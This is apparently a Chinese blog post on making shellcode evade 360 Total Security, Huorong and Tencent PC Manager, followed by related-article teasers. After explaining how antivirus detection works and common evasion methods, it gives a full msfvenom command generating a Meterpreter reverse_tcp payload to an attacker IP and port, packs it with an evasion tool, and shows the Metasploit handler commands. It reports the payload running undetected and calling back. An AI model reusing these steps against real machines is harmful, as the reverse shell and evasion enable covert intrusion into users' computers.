正文 

当前位置: 首页 > 程序 > java教程

shellcode免杀,绕过360安全卫士火绒安全腾讯管家(代码片段)

exploitsec exploitsec     2022-11-23     606

关键词:

前言

分享一个傻瓜式直接套用大佬的框架进行shellcode免杀,自己还是萌新还需要学习很多东西,大佬们不喜勿喷

杀毒原理

360、腾讯电脑管家、火绒剑、金山毒霸、瑞星等等,这几个杀毒软件领头羊,现在的杀毒软件都无法脱离三个部分,扫描器、病毒库、虚拟机。然而一个杀毒软件做的是否好用,最主要的还是扫描器的速度、准确率以及病毒库是否庞大。

1.基于特征码的静态扫描技术
这种技术很容易被人想到,所以第一代的杀毒软件出现了,他们的杀毒思想就是,我只要匹配到特征字符串就可以判断出来这个文件是一个病毒。但这种方法在当今病毒技术迅猛发展的形势下已经起不到很好的作用了。

2.启发式扫描
为了对付病毒的不断变化和对未知病毒的研究,启发式扫描方式出现了。启发式扫描是通过分析指令出现的顺序,或特定组合情况等常见病毒的标准特征来判断文件是否感染未知病毒。

可以根据扫描特定的行为或多种行为的组合来判断一个程序是否是病毒。例如,制定一套打分机制,在系统目录下释放文件得20分,对分区进行格式化得100分,对启动项进行操作得50分等,只要评分达到某个预设值,即可判断为病毒文件。

3.虚拟机技术
查毒引擎中的虚拟机,并不是像VMWare的工作原理那样,为待查的可执行程序创建一个虚拟的执行环境,提供它可能用到的一切元素,包括硬盘,端口等,让它在其上自由发挥,最后根据其行为来判定是否为病毒。

设计虚拟机查毒的目的,就是为了对付加密变形病毒,虚拟机首先从文件中确定并读取病毒入口处代码,然后以上述工作步骤解释执行病毒头部的解密段(Decryptor),最后在执行完的结果(解密后的病毒体明文)中查找病毒的特征码。

免杀技术

1.修改特征码
既然杀毒软件在最开始时,使用了病毒特征码概念,那么我们可以通过修改病毒特征码的方式躲过杀软扫描。

第一种是更改特征码,例如:一个文件在某一个地址内有 “灰鸽子上线成功” 这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了。

第二种是根据校验和查杀技术提出的免杀思想,如果一个文件某个特定区域的校验和符合病毒库中的特征,那么反病毒软件就会报警。如果想阻止反病毒软件报警,只要对病毒的特定区域进行一定的更改,就会使这一区域的校验和改变,从而达到欺骗反病毒软件的目的。

2.花指令免杀
花指令免杀是指,在程序shellcode或特征代码区域增添垃圾指令,这些指令没有实际含义,不会改变程序运行逻辑,但可以阻止反编译,现在杀软在检测特征码时,都会存在偏移范围,当我们使用花指令对特征码区域进行大量填充,这样就可以实现躲避杀软的特性。

3.加壳免杀
加壳,程序加壳可以很好的躲避匹配特征码查杀方式,加密壳基本上可以把特征码全部掩盖。这里说的壳指加密壳,一些普通压缩壳,并不能起到改变特征码的效果,例如:UPX、ASPack等。

现在杀软会在检测到文件采用加密壳之后,直接提醒用户,该文件存在问题。可以使用不常见加密壳对程序进行加壳,来躲避杀软,该方法理论可用,只通过加壳实现免杀,成功几率很小,现在基于虚拟机技术,内存监测技术的发展,通过加壳方式进行免杀的思路越来越窄。

4.二次编译
msfvenom提供了多种格式的payload和encoder,生成的shellcode也为二次加工提供了很大便利,但是也被各大厂商盯得死死的。

而shikata_ga_nai是msf中唯一的评价是excellent的编码器,这种多态编码技术使得每次生成的攻击载荷文件是不一样的,编码和解码也都是不一样。还可以利用管道进行多重编码进行免杀。

目前msfvenom的encoder特征基本都进入了杀软的漏洞库。互联网上有很多借助于C、C#、python等语言对shellcode进行二次编码从而达到免杀的效果。

借鉴KeePassX大佬的文章:https://www.freebuf.com/articles/web/271271.html

Shellcode免杀测试

测试需要用到:攻击机kali、掩日3.0、虚拟机win10系统

掩日3.0下载安装:https://github.com/1y0n/AV_Evasion_Tool
需要3.x 依赖:
1.64位 Windows 7810 操作系统
2. .net framework 4.0 或更高版本 (Windows 自带)
3. tdm-gcc

启动MSF使用msfvenom生成一个shellcode.c文件出来

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.130 LPORT=6666 -f c > /root/sheelcode.c

得到的shellcode.c如下

然后我们使用掩日3.0进行傻瓜式免杀


生成好之后我们先试试各大杀毒平台的静态杀毒扫描检测

1.火绒

2.腾讯管家

3.360安全卫士

以上检测360安全卫士、火绒安全、腾讯管家成功bypass

然后我们运行msf平台监听木马试试各大平台的杀毒动态检测

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.111.130
set lport 6666
run



直接上线没有拦截、检测到,最后总结:害,有免杀总比没有好,哈哈哈哈哈QAQ

shellcode免杀丨c语言三条指令免杀360!你还困吗?(代码片段)

shellcode免杀(1)C语言三条指令免杀360✉ 1简介描述有错的地方各位师傅海涵。经过一下午的C语言测试,得出了十多种过360的·方法,这里拿三种c的方式过360(思路大体相同),还有一个c++的免... 查看详情

免杀思路总结(代码片段)

免杀思路总结1.免杀技术简介2.杀毒软件检测方法3.绕过技术1.免杀技术简介1.免杀的重要性2.免杀的难度3.杀毒软件的排行国外国内1、Bitdefender1、3602、Norton3602、智量安全(没测过,据说很厉害)3、Kaspersky 3、火绒安全4、Webroot 4... 查看详情

免杀思路总结(代码片段)

免杀思路总结1.免杀技术简介2.杀毒软件检测方法3.绕过技术1.免杀技术简介1.免杀的重要性2.免杀的难度3.杀毒软件的排行国外国内1、Bitdefender1、3602、Norton3602、智量安全(没测过,据说很厉害)3、Kaspersky 3、火绒安全4、Webroot 4... 查看详情

360安全卫士推出“极速版”:永久免费无弹窗广告!

2021年7月20日,360安全卫士正式对外发布新产品——360安全卫士“极速版”。据悉,“极速版”主打“永久免费、无弹窗广告”,聚焦简单操作与纯净视觉体验,是360安全卫士的一次革新。目前,该版本已在官... 查看详情

今天安装了advancedsystemcare然后用它卸载了360安全卫士,重启后360安全卫士还是继续运行,怎么办?

...单最下方,选择“所有程序”,在弹出的菜单中找到“360安全卫士”,然后找到“卸载360安全卫士”菜单项,点击即可开始卸载360安全卫士。如果以上方法不能奏效,应该是你的卸载工具被破坏导致的,请先覆盖安装一遍再卸载... 查看详情

waf攻防工具行为免杀&命令执行绕过&面板安全(代码片段)

一、webshell工具-BT&Aliyun-功能绕过webshell管理工具冰蝎:https://github.com/rebeyond/Behinder/releases哥斯拉:https://github.com/BeichenDream/Godzilla/releases蚁剑:https://github.com/AntSwordProje 查看详情

360安全卫士怎么打开加速球

打开这个东西开始操作功能大全输入流量防火墙,然后敲回车在360流量防火墙界面,左键单击序号2.然后就打开这个流量防火墙设置,然后打开序号3就可以了 查看详情

上线一个月好评如潮360安全卫士极速版靠什么赢得芳心?

“360安全卫士极速版虽然功能简化了,但安全性能依旧不错。”“用了360安全卫士极速版后,我把别的用了8年的软件卸载了。”“其实360还是很不错的……真的没有弹窗广告了”不少用户评论道。近日,360安全卫士... 查看详情

exp3免杀原理与实践(代码片段)

Exp3免杀原理与实践这次的实验令我非常兴奋,因为要对抗的是各大杀毒软件厂商,所以事先得做好很多功课。另一方面我也想看看metasploit在这场猫鼠游戏中能不能走在安全厂商的前面。这次的目标免杀平台是64位windows7SP1,我用... 查看详情

(wpf)360安全卫士界面设计

点击下载 <ResourceDictionaryxmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schemas.microsoft.com/expression/ 查看详情

慎用“360安全卫士”一键清理功能

...2所示),只清理出了几GB的空间,效果不大。我想起"360安全卫士"有个一键清理功能,可以清除无用的垃圾,就想用这个软件清理一下。在帮助别人之后,我想我自己的计算机也很长时间没有清理了,同 查看详情

360安全卫士上线新功能:一周电脑安全动态全掌握

...,才能让工作生活更加便利,因此定期掌握电脑安全状态是非常有必要的。11月23日,360安全卫士推出全新功能“360安全周报”让你一键查看每周电脑运行情况,及时全面了解电脑的安全健康状态,给你“看得... 查看详情

网络安全赛道,360安全卫士站上新高地

...会上,工信部新闻发言人赵志国再次提出“推进网络安全技术攻关和创新应用,加快网络安全产品供给”的要求。网络安全问题如今已是全社会关注的焦点,仅今年上半年国内就举办了4次大规模网络安全大会,在... 查看详情

安全攻防实战系列msf

...进行信息收集,通过cms或者其他漏洞拿到shell,之后通过免杀木马将windows或linux服务器上线到cobaltstrike或msf等c2服务器,之后对内网进行信息收集并绘制网络拓扑图,进行工作组或域渗透,拿到各个网段机器的权限,远程登陆并... 查看详情

cobalstrike免杀过360

...;大家可以自行百度搜素,这里就不放链接了将生成的shellcode复制,打开掩日(我用的2.0,新的用不惯)选项基本默认就好了,点击生成,记得生成的免杀后门不要放在中文路径里将其上传到靶机用360和... 查看详情

c#语言实例源码系列-仿360安全卫士界面

专栏分享点击跳转=>Unity3D特效百例点击跳转=>案例项目实战源码点击跳转=>游戏脚本-辅助自动化点击跳转=>Android控件全解手册 查看详情

windows安全更新和360卫士漏洞补丁的区别

想问下,有360卫士下载漏洞补丁了,WINDOWS安全更新还需要开着吗?二者在更新的内容上有什么区别?参考技术A如果你的操作系统是正版,则没有区别.如果是盗版,最好使用第三方软件(如360安全卫士)进行系统更新或升级,因为如果... 查看详情

windows免杀小结(工具篇)

...上传绕过手段Shellter:利用过程参考:KaliShellter5.1:动态ShellCode注入工具绕过安全软件这里使用apt-get安装:安装以后,从终端启动:键入“A”启用自动模式PE目标为plink.exe,这里我们复制一个到root目录下在提示PE目标时,输入:... 查看详情